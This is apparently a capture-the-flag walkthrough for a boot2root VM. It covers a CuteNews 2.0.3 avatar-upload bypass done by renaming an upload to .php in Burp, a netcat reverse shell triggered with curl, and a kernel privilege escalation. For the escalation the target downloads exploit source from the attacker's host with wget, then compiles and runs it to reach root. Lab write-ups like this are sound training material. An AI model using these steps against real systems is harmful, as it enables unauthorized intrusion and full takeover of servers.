Simple CTF is a boot2root that focuses on the basics of web-based hacking. /root/flag.txt is your ultimate goal.
- Get a user shell by uploading a reverse shell and executing it.
- A proxy may help you to upload the file you want, rather than the file that the server expects.
- There are 3 known privesc exploits that work. Some people have had trouble executing one of them unless it was over a reverse shell using a netcat listener.
root@kali:~# nmap -n -p- -A 192.168.56.104

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Please Login / CuteNews
CuteNews 2.0.3 has an arbitrary file upload vulnerability in the avatar function, which is available to any registered user. I first registered an account as rasta:mouse and logged in, then navigated to Personal options and selected the Browse button to upload an avatar. The reverse shell was saved as /root/rasta.jpg, with the IP address changed to my listener for the callback.
Before the upload, open Burp and turn intercept on. When you upload the file, use Burp to change the extension of the filename in the intercepted request from .jpg to .php, so that filename="rasta.jpg" in the multipart body becomes filename="rasta.php". The server keeps the client-supplied extension when it stores the avatar, which is what makes the upload exploitable.
Once the file has been uploaded, create a netcat listener and execute your shell by requesting the uploaded file from a second terminal:

root@kali:~# nc -lnvp 1234
listening on [any] 1234 ...

root@kali:~# curl http://192.168.56.104/uploads/avatar_rasta_rasta.php

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.104] 52214
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 08:01:39 up 37 min,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
This VM is running Ubuntu 14.04.1 with kernel 3.16.0-30, which has a local privilege escalation vulnerability that will take us straight to root:

$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
I started python -m SimpleHTTPServer on my Kali box and used wget on the target to download the exploit source code. gcc is installed on the VM, so we can compile and run it without issue:
$ wget http://192.168.56.102:8000/x.c
$ ls -l
-rw-rw-rw- 1 www-data www-data 5123 Apr 16 06:20 x.c
$ gcc x.c -o x
$ ./x
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/flag.txt
U wyn teh Interwebs!!1eleven11!!1! Hack the planet!